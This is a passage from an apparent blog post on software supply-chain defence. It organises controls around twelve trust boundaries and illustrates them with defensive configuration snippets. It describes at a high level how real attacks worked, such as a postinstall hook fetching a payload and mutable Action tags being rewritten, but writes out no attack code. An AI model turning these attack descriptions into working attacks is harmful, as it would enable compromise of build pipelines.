&lt;strong&gt;2026: &lt;code&gt;axios@1.14.1&lt;/code&gt;:&lt;/strong&gt; as above.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Strip the variations and you get four primitives that every modern attack chains: (1) &lt;strong&gt;dependency injection&lt;/strong&gt; (typosquats, dependency confusion, maintainer compromise); (2) &lt;strong&gt;build-time injection&lt;/strong&gt; (postinstall hooks, curl-bashed installers, malicious Actions); (3) &lt;strong&gt;mutable-reference rewrite&lt;/strong&gt; (tag rewrites, branch tracking, CDN URLs without integrity); and (4) &lt;strong&gt;trust-relationship abuse&lt;/strong&gt; (compromising a tooling vendor, a maintainer's MFA, a token leaked in a CI log). axios chained (4) → (1) → (2). tj-actions chained (4) → (1) → (3) → (2). Any single layer of defense would have broken either chain. Most repos had none of them.&lt;/p&gt;




&lt;h2&gt;
  
  
  The twelve boundaries
&lt;/h2&gt;

&lt;p&gt;Security engineers think in &lt;strong&gt;boundaries&lt;/strong&gt;: points where trust transfers from one entity to another. Each boundary is a place attackers operate and a place defenders need a control. The twelve below split into three phases: what enters your repo (1–4), what runs during your build (5–9), and what ships at runtime (10–12), plus a final section on what to do when one of them fails. Some will.&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 1, Source-side: what enters your repo
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 1: Source → Repository (Who can write to &lt;code&gt;main&lt;/code&gt;?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; insider with too-broad write access; accidental merge of malicious code.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt; branch protection, required reviewers, CODEOWNERS for security-sensitive paths (workflows, Dockerfiles, dependency manifests). Force-push protection on protected branches. Required status checks must include the controls below.&lt;/p&gt;

&lt;p&gt;The forge-level (GitHub / GitLab / Bitbucket / Gerrit) primitives differ; the rule is identical: humans cannot push to &lt;code&gt;main&lt;/code&gt;; only the merge bot can, and only after policy passes.&lt;/p&gt;
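&lt;p&gt;A minimal CODEOWNERS sketch for the security-sensitive-paths rule (the team handle is hypothetical):&lt;/p&gt;

```
# Require review from a dedicated group on the paths attackers care about most.
/.github/workflows/   @yourorg/platform-security
/Dockerfile           @yourorg/platform-security
/pnpm-lock.yaml       @yourorg/platform-security
/pnpm-workspace.yaml  @yourorg/platform-security
```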
&lt;h4&gt;
  
  
  Boundary 2: Maintainer → Package (Is this dependency safe?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; typosquats, dependency confusion (publishing a public package whose name shadows a private one, tricking the resolver), maintainer compromise. &lt;code&gt;axios@1.14.1&lt;/code&gt; is the canonical example of the third: published from a stolen credential, malicious for three hours, gone afterwards.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls (registry-time):&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Pin to immutable identifiers.&lt;/strong&gt; Lockfile committed; exact-version constraints; no caret/tilde ranges in production dependencies; &lt;code&gt;pnpm install --frozen-lockfile&lt;/code&gt; (or &lt;code&gt;npm ci&lt;/code&gt;, &lt;code&gt;pip install --require-hashes&lt;/code&gt;, &lt;code&gt;cargo build --locked&lt;/code&gt;, &lt;code&gt;mvn -B verify&lt;/code&gt;, &lt;code&gt;bundle install --frozen&lt;/code&gt;, &lt;code&gt;dotnet restore --locked-mode&lt;/code&gt;) in CI. The general invariant: every dependency entry resolves to a content-addressed artifact, not a URL.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cooldown on freshly published versions.&lt;/strong&gt; Reject packages younger than N days, on the premise that fresh-publish malware is detected and yanked within 24–72 hours. The premise has limits (&lt;code&gt;xz-utils&lt;/code&gt; ran for ~2 years undetected), so this control buys hours-to-days of latency, not certainty.&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;   &lt;span class="c1"&gt;# pnpm-workspace.yaml value is in minutes; 4320 min = 72 h = 3 days&lt;/span&gt;
   &lt;span class="na"&gt;minimumReleaseAge&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;4320&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;code&gt;axios@1.14.1&lt;/code&gt; was unpublished within three hours. With &lt;code&gt;minimumReleaseAge: 4320&lt;/code&gt;, pnpm would have refused to install it for 72 hours after publish. By the time the install would have unblocked, the malicious version was already gone.&lt;/p&gt;

&lt;p&gt;Stack-neutral: pnpm has this natively; Renovate's &lt;code&gt;minimumReleaseAge&lt;/code&gt; config covers npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform (any ecosystem Renovate manages). For stacks without native or Renovate support, layer reputation signals: &lt;strong&gt;Socket&lt;/strong&gt; (behavioural risk score), &lt;strong&gt;Phylum&lt;/strong&gt; (heuristic quarantine), &lt;strong&gt;OSV-Scanner&lt;/strong&gt; + &lt;strong&gt;EPSS&lt;/strong&gt; scores for exploit-likelihood prioritisation, &lt;strong&gt;OpenSSF Scorecard&lt;/strong&gt; for upstream maintenance health, and &lt;code&gt;npm audit signatures&lt;/code&gt; for registry signature verification.&lt;/p&gt;
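&lt;p&gt;A minimal Renovate sketch of the same cooldown (matcher syntax varies by Renovate version, and the repo-wide scope is an assumption about your setup):&lt;/p&gt;

```json
{
  "packageRules": [
    {
      "matchPackageNames": ["*"],
      "minimumReleaseAge": "3 days"
    }
  ]
}
```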

&lt;ol start="3"&gt;
&lt;li&gt;
&lt;strong&gt;Provenance.&lt;/strong&gt; Where available, prefer packages published with provenance attestations. &lt;code&gt;npm publish --provenance&lt;/code&gt; (since npm 9.5) records a signed Sigstore provenance entry binding the published tarball to the GitHub Actions workflow that built it. PyPI Trusted Publishers + PEP 740 attestations are the Python equivalent. Maven Central PGP signatures + &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; cover Java. Provenance doesn't stop a credential-theft attack like axios (the malicious workflow would still produce a signed entry), but it gives forensics a starting point.&lt;/li&gt;
&lt;/ol&gt;
&lt;h4&gt;
  
  
  Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; registry compromise, off-registry tarballs without integrity, mid-flight tampering.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; lockfile committed; integrity hash (&lt;code&gt;sha512:&lt;/code&gt;, &lt;code&gt;sha256:&lt;/code&gt;, OCI digest) on every entry; CI install command refuses to mutate the lockfile. &lt;strong&gt;Easy thing to miss:&lt;/strong&gt; a lockfile entry like &lt;code&gt;tarball: https://cdn.somehost.com/foo.tgz&lt;/code&gt; without an &lt;code&gt;integrity:&lt;/code&gt; field is functionally &lt;code&gt;latest&lt;/code&gt;. Audit yours for entries where the hash field is empty or pointing to a URL the registry doesn't verify.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# tools/scripts/verify-supply-chain.sh runs in CI&lt;/span&gt;
&lt;span class="c"&gt;# Fails if the lockfile contains any off-registry tarball not on this allowlist.&lt;/span&gt;
&lt;span class="nv"&gt;EXPECTED_TARBALLS&lt;/span&gt;&lt;span class="o"&gt;=(&lt;/span&gt;
  &lt;span class="s2"&gt;"https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz"&lt;/span&gt;  &lt;span class="c"&gt;# SheetJS withdrew xlsx from npm in 2023&lt;/span&gt;
&lt;span class="o"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In retrospect, this kind of lockfile scrutiny would also have flagged the &lt;code&gt;axios@1.14.1&lt;/code&gt; situation early: a brand-new transitive (&lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;) appeared in the lockfile diff. A mandatory PR-time review on lockfile additions catches what the eye doesn't.&lt;/p&gt;

&lt;p&gt;The general invariant translates: pip's &lt;code&gt;--require-hashes&lt;/code&gt;, Cargo's checksum field, Maven's &lt;code&gt;--strict-checksums&lt;/code&gt;, NuGet package signing, Go's module sum database. Every modern package manager has the primitive; the discipline is auditing for entries where it isn't enforced.&lt;/p&gt;
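&lt;p&gt;A sketch of that audit (the input layout is a simplified stand-in, not the exact pnpm lockfile format): every &lt;code&gt;tarball:&lt;/code&gt; entry must be followed by an &lt;code&gt;integrity:&lt;/code&gt; line before the next entry begins, or its URL is flagged.&lt;/p&gt;

```shell
flag_unverified_tarballs() {
  awk '
    /tarball:/ {
      if (url != "" && !ok) print url   # previous entry never got a hash
      url = $2; ok = 0
    }
    /integrity:/ { ok = 1 }
    END { if (url != "" && !ok) print url }
  ' "$1"
}

# Demo on a two-entry sample: only the hash-less entry is reported.
printf '  tarball: https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz\n  integrity: sha512-abc\n  tarball: https://cdn.somehost.com/foo.tgz\n' > sample.lock
flag_unverified_tarballs sample.lock   # prints https://cdn.somehost.com/foo.tgz
```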

&lt;h4&gt;
  
  
  Boundary 4: Install → Lifecycle scripts (What runs on install?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; malicious lifecycle hooks. The axios attack's payload ran here. &lt;code&gt;plain-crypto-js@4.2.1&lt;/code&gt;'s entire malicious behaviour was a &lt;code&gt;postinstall: node setup.js&lt;/code&gt;. Without that hook, the package would have sat on disk doing nothing until something &lt;code&gt;require()&lt;/code&gt;'d it, and &lt;code&gt;axios&lt;/code&gt; doesn't import &lt;code&gt;plain-crypto-js&lt;/code&gt;. The postinstall was the only thing that turned a passive disk write into RCE during install.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Default-deny on install scripts&lt;/strong&gt;, allowlist of who may run them:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="nl"&gt;"pnpm"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="nl"&gt;"onlyBuiltDependencies"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"esbuild"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@swc/core"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"@datadog/native-iast-taint-tracking"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
         &lt;/span&gt;&lt;span class="s2"&gt;"prisma"&lt;/span&gt;&lt;span class="w"&gt;
       &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
     &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
   &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;plain-crypto-js&lt;/code&gt; would not have been on any team's allowlist. &lt;code&gt;pnpm install --ignore-scripts&lt;/code&gt; (read-only CI workflows) and &lt;code&gt;onlyBuiltDependencies&lt;/code&gt; (pnpm 10) each, independently, neutralise the postinstall vector.&lt;/p&gt;

&lt;ol start="2"&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Behavioural quarantine.&lt;/strong&gt; &lt;code&gt;Socket&lt;/code&gt; and &lt;code&gt;Phylum&lt;/code&gt; analyse new transitives for suspicious patterns (network calls, file-system access, dynamic eval) before they reach your lockfile. &lt;code&gt;npq&lt;/code&gt; wraps &lt;code&gt;npm install&lt;/code&gt; to prompt before installing freshly published packages. None of these would catch a sufficiently subtle payload, but &lt;code&gt;plain-crypto-js&lt;/code&gt;'s &lt;code&gt;node setup.js&lt;/code&gt; → C2 download is exactly the shape they flag.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Build-host sandboxing.&lt;/strong&gt; Run installs inside an ephemeral container with no network egress except to the registry; or use Bubblewrap / Firejail / Chainguard's hardened images. Defence-in-depth for the case where the lifecycle gate fails open.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;The limit:&lt;/strong&gt; lifecycle gates block &lt;code&gt;preinstall&lt;/code&gt; / &lt;code&gt;install&lt;/code&gt; / &lt;code&gt;postinstall&lt;/code&gt;. They do not prevent module-load-time top-level execution when an attacker-controlled package gets &lt;code&gt;require()&lt;/code&gt;'d or &lt;code&gt;import&lt;/code&gt;'d during &lt;code&gt;vitest&lt;/code&gt;, &lt;code&gt;tsc&lt;/code&gt;, &lt;code&gt;eslint&lt;/code&gt;, or any other tool that imports your code graph. The &lt;code&gt;minimumReleaseAge&lt;/code&gt; cooldown (Boundary 2) is the layer behind that.&lt;/p&gt;

&lt;p&gt;Stack equivalents: pip's risky surface is &lt;code&gt;setup.py&lt;/code&gt; install hooks (mitigate with &lt;code&gt;--only-binary=:all:&lt;/code&gt;); Ruby's is &lt;code&gt;gem install&lt;/code&gt; running &lt;code&gt;extconf.rb&lt;/code&gt;; Cargo's is &lt;code&gt;build.rs&lt;/code&gt; (sandbox via Bazel &lt;code&gt;rules_rust&lt;/code&gt; or &lt;code&gt;cargo-deny&lt;/code&gt; bans); .NET's modern PackageReference does not run scripts (legacy &lt;code&gt;packages.config&lt;/code&gt; does); Maven and Gradle's are build plugins (audit &lt;code&gt;&amp;lt;build&amp;gt;&amp;lt;plugins&amp;gt;&lt;/code&gt; and &lt;code&gt;buildscript { dependencies }&lt;/code&gt;).&lt;/p&gt;

&lt;h3&gt;
  
  
  Phase 2, Build-side: what runs during your build
&lt;/h3&gt;

&lt;h4&gt;
  
  
  Boundary 5: Source → Image (Is our build environment trustworthy?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; base image tag rewrite, secrets baked into image layers.&lt;br&gt;
&lt;strong&gt;Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Pin every &lt;code&gt;FROM&lt;/code&gt; by &lt;code&gt;@sha256:&amp;lt;digest&amp;gt;&lt;/code&gt;.&lt;/strong&gt; Tags are mutable; digests are content-addressed (the SHA changes if the bytes change, so a rewrite is detectable).
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;   FROM node:20.11.1-alpine3.19@sha256:735dd688da64d22ebd9... AS base
   USER node
   CMD ["node", "dist/main.js"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ol start="2"&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Drop privileges with &lt;code&gt;USER&lt;/code&gt; before &lt;code&gt;CMD&lt;/code&gt;.&lt;/strong&gt; For Node images: &lt;code&gt;USER node&lt;/code&gt;. For nginx: switch to &lt;code&gt;nginxinc/nginx-unprivileged&lt;/code&gt; (drop-in non-root replacement listening on 8080).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Never put secrets in &lt;code&gt;ARG&lt;/code&gt; defaults&lt;/strong&gt; they persist in &lt;code&gt;docker history&lt;/code&gt;. Use BuildKit &lt;code&gt;--mount=type=secret&lt;/code&gt; for build-time secrets.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Hermetic builds for the highest tier.&lt;/strong&gt; Bazel &lt;code&gt;rules_oci&lt;/code&gt;, Nix &lt;code&gt;dockerTools&lt;/code&gt;, Chainguard's &lt;code&gt;apko&lt;/code&gt; + &lt;code&gt;melange&lt;/code&gt; produce reproducible images where every byte is content-addressed back to source. Overkill for most teams; required for SLSA L3+.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
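&lt;p&gt;Item 3 in practice, sketched (the secret id and install command are assumptions): BuildKit mounts the secret for the duration of a single &lt;code&gt;RUN&lt;/code&gt;, and it never lands in a layer.&lt;/p&gt;

```dockerfile
# Pass with: docker build --secret id=npm_token,src=./npm-token.txt .
RUN --mount=type=secret,id=npm_token \
    NPM_TOKEN="$(cat /run/secrets/npm_token)" pnpm install --frozen-lockfile
```

&lt;p&gt;Contrast with &lt;code&gt;ARG NPM_TOKEN&lt;/code&gt;, which any later &lt;code&gt;docker history&lt;/code&gt; would reveal.&lt;/p&gt;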
&lt;h4&gt;
  
  
  Boundary 6: Image → Registry (Can downstream verify what we shipped?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; image tag rewrite at the registry; image swap; "did we actually ship this build?" forensics gap.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; &lt;strong&gt;cosign keyless signing via Sigstore.&lt;/strong&gt; Sigstore is a free signing service; &lt;strong&gt;Fulcio&lt;/strong&gt; is its short-lived certificate authority; &lt;strong&gt;Rekor&lt;/strong&gt; is its public transparency log; the &lt;strong&gt;SET&lt;/strong&gt; (Signed Entry Timestamp) is Rekor's tamper-proof timestamp binding the signature to a moment when the cert was still valid. GitHub Actions OIDC issues a short-lived signing identity, Fulcio mints a certificate valid for ~10 minutes, and the signature is recorded in Rekor.&lt;/p&gt;

&lt;p&gt;Treat Rekor as load-bearing, not optional. The Fulcio cert expires almost immediately; what makes a keyless signature verifiable hours or years later is the Rekor inclusion proof. A &lt;code&gt;cosign verify&lt;/code&gt; that doesn't check the SET is meaningless after cert expiry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Verify with workflow-path anchoring&lt;/strong&gt;, not a loose org regex:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cosign verify &amp;lt;image&amp;gt;@&amp;lt;digest&amp;gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity-regexp&lt;/span&gt; &lt;span class="s2"&gt;"^https://github&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;com/yourorg/yourrepo/&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;github/workflows/release&lt;/span&gt;&lt;span class="se"&gt;\.&lt;/span&gt;&lt;span class="s2"&gt;yml@refs/heads/main$"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt; &lt;span class="s2"&gt;"https://token.actions.githubusercontent.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-github-workflow-repository&lt;/span&gt; &lt;span class="s2"&gt;"yourorg/yourrepo"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-github-workflow-ref&lt;/span&gt; &lt;span class="s2"&gt;"refs/heads/main"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;An open &lt;code&gt;^https://github.com/yourorg/&lt;/code&gt; regex matches any workflow under the org, including a malicious workflow added in a fork and run via &lt;code&gt;pull_request_target&lt;/code&gt;. Anchor on the workflow path, anchor on the ref, and test the regex with a known-different workflow before relying on it. Unanchored regexes (missing &lt;code&gt;^&lt;/code&gt; or &lt;code&gt;$&lt;/code&gt;) match more workflows than you intended.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Signing alone does not satisfy SLSA&lt;/strong&gt; (Supply-chain Levels for Software Artifacts, a framework grading build-provenance trustworthiness). The signature proves who built the image, not how. SLSA Build L3 requires provenance attestations in &lt;code&gt;in-toto&lt;/code&gt; format (&lt;code&gt;https://slsa.dev/provenance/v1&lt;/code&gt; predicate), produced by &lt;code&gt;cosign attest --predicate&lt;/code&gt; from a hardened, isolated builder such as &lt;code&gt;slsa-github-generator&lt;/code&gt;. Verify with &lt;code&gt;cosign verify-attestation&lt;/code&gt;. The signature is the foundation; the attestation chain is the rest of the building.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A signature you don't verify at deploy time is theatre.&lt;/strong&gt; Wire &lt;code&gt;cosign verify&lt;/code&gt; into a Kubernetes admission controller (&lt;strong&gt;Kyverno&lt;/strong&gt; &lt;code&gt;verifyImages&lt;/code&gt;, &lt;strong&gt;Connaisseur&lt;/strong&gt;, or &lt;strong&gt;Sigstore policy-controller&lt;/strong&gt;) so the cluster refuses to schedule unsigned or wrong-identity images. GitHub's native &lt;code&gt;gh attestation verify&lt;/code&gt; (GA 2024) is the simplest verification entry-point if you're not on Kubernetes.&lt;/p&gt;
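&lt;p&gt;A Kyverno sketch of that refusal (the policy name, registry, and identity values are assumptions to adapt):&lt;/p&gt;

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-signed-images
spec:
  validationFailureAction: Enforce
  rules:
    - name: verify-release-signature
      match:
        any:
          - resources:
              kinds: ["Pod"]
      verifyImages:
        - imageReferences: ["ghcr.io/yourorg/*"]
          attestors:
            - entries:
                - keyless:
                    subject: "https://github.com/yourorg/yourrepo/.github/workflows/release.yml@refs/heads/main"
                    issuer: "https://token.actions.githubusercontent.com"
```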

&lt;p&gt;Stack-agnostic: cosign works on any container image registry (ECR, GHCR, ACR, GAR, Harbor, Artifactory, Quay) and on generic blobs via &lt;code&gt;cosign sign-blob&lt;/code&gt;. Sigstore Fulcio currently trusts OIDC issuers from GitHub, GitLab, Buildkite, CircleCI, Google, and Microsoft: same &lt;code&gt;cosign sign --identity-token&lt;/code&gt; flow, different &lt;code&gt;iss&lt;/code&gt; claim. PEP 740 attestations + &lt;code&gt;python -m sigstore&lt;/code&gt; cover Python wheels; &lt;code&gt;sigstore-maven-plugin&lt;/code&gt; covers Java JARs.&lt;/p&gt;

&lt;h4&gt;
  
  
  Boundary 7: Tag → Commit (What does this &lt;code&gt;uses:&lt;/code&gt; / include / plugin actually point to?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;This is the boundary tj-actions exploited.&lt;/strong&gt; A line like &lt;code&gt;uses: tj-actions/changed-files@v45&lt;/code&gt; resolves at build time to whatever commit the &lt;code&gt;v45&lt;/code&gt; tag currently references. Tags are mutable. Commit SHAs are not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; pin every external &lt;code&gt;uses:&lt;/code&gt; to a 40-character commit SHA with a tag comment.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pulumi/actions@8582a9e8cc630786854029b4e09281acd6794b58&lt;/span&gt; &lt;span class="c1"&gt;# v6&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Enforce in CI with &lt;code&gt;pinact run --check --verify&lt;/code&gt;. It fails the PR if anything is unpinned, and flags drift between the pinned SHA and the SHA the upstream tag currently resolves to. It catches inadvertent drift. It does not by itself defeat a tag-rewrite attack: &lt;code&gt;pinact&lt;/code&gt; will surface the mismatch but cannot tell you which side is hostile. Pair it with a higher-trust signal: Sigstore attestation verification, GitHub's &lt;code&gt;gh attestation verify&lt;/code&gt; for Action artifacts (GA 2024), &lt;code&gt;StepSecurity Harden-Runner&lt;/code&gt; for egress-policy + tampering detection on the runner, or human review of any flagged drift.&lt;/p&gt;

&lt;p&gt;When we started, none of our 110 &lt;code&gt;uses:&lt;/code&gt; lines were SHA-pinned. That included &lt;code&gt;pulumi/actions&lt;/code&gt; (cloud-deploy authority), &lt;code&gt;lasith-kg/dispatch-workflow&lt;/code&gt; (single maintainer), &lt;code&gt;aws-actions/configure-aws-credentials&lt;/code&gt; (×11), and &lt;code&gt;docker/build-push-action&lt;/code&gt; (×3, ECR push). They all are now, with a CI gate so they stay that way.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Translate to your CI:&lt;/strong&gt; GitLab &lt;code&gt;include:&lt;/code&gt; should pin &lt;code&gt;ref:&lt;/code&gt; to a SHA, not &lt;code&gt;main&lt;/code&gt;. Buildkite plugins should pin &lt;code&gt;plugin@&amp;lt;sha&amp;gt;&lt;/code&gt;, not &lt;code&gt;@v1&lt;/code&gt;. CircleCI orbs are best inlined or vendored. Jenkins shared libraries should pin &lt;code&gt;@Library('foo@&amp;lt;sha&amp;gt;')&lt;/code&gt;. Bazel modules pin via &lt;code&gt;MODULE.bazel.lock&lt;/code&gt;. The control: no mutable references to third-party code anywhere in CI config.&lt;/p&gt;
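&lt;p&gt;For CI systems without a pinact equivalent, the control reduces to a grep (a rough sketch; the patterns assume GitHub-style &lt;code&gt;uses:&lt;/code&gt; lines and need adapting elsewhere):&lt;/p&gt;

```shell
# List uses: references that are neither local (./), docker://, nor pinned
# to a full 40-character commit SHA. Empty output means everything is pinned.
check_pins() {
  grep -rhoE 'uses:[[:space:]]*[^[:space:]]+' "$1" \
    | grep -vE 'uses:[[:space:]]*(\./|docker://)' \
    | grep -vE '@[0-9a-f]{40}($|[[:space:]])' \
    || true    # grep exits non-zero when nothing is unpinned; that is success
}

# In CI: unpinned=$(check_pins .github/workflows); [ -z "$unpinned" ] || { echo "$unpinned"; exit 1; }
```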

&lt;h4&gt;
  
  
  Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Threat:&lt;/strong&gt; any step in a workflow inherits the workflow's permissions and any environment-scoped secrets. A compromised Action running with &lt;code&gt;permissions: write-all&lt;/code&gt; receives a &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; with write scopes across that repository's API surface (contents, issues, pull requests, packages, deployments) for the duration of that workflow run.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controls:&lt;/strong&gt; default-deny at workflow level, grant per-job:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;       &lt;span class="c1"&gt;# for checkout&lt;/span&gt;
      &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;      &lt;span class="c1"&gt;# for AWS OIDC&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;zizmor&lt;/code&gt; (free workflow-security linter) audits this on every PR. When we ran it the first time, 8 of our 16 workflows were running &lt;code&gt;permissions: write-all&lt;/code&gt;. Today none of them do.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reusable workflows (&lt;code&gt;workflow_call&lt;/code&gt;)&lt;/strong&gt; inherit the caller's &lt;code&gt;permissions:&lt;/code&gt; unless explicitly overridden. &lt;code&gt;secrets: inherit&lt;/code&gt; on the caller hands every repository secret to the callee. Pass secrets explicitly by name and re-declare &lt;code&gt;permissions:&lt;/code&gt; in every reusable workflow.&lt;/p&gt;
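&lt;p&gt;A caller sketch of the explicit pattern (the workflow path and secret name are assumptions):&lt;/p&gt;

```yaml
jobs:
  review:
    uses: ./.github/workflows/llm-review.yml   # hypothetical reusable workflow
    permissions:
      contents: read
      pull-requests: write
    secrets:
      OPENROUTER_API_KEY: ${{ secrets.OPENROUTER_API_KEY }}   # named, not `inherit`
```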

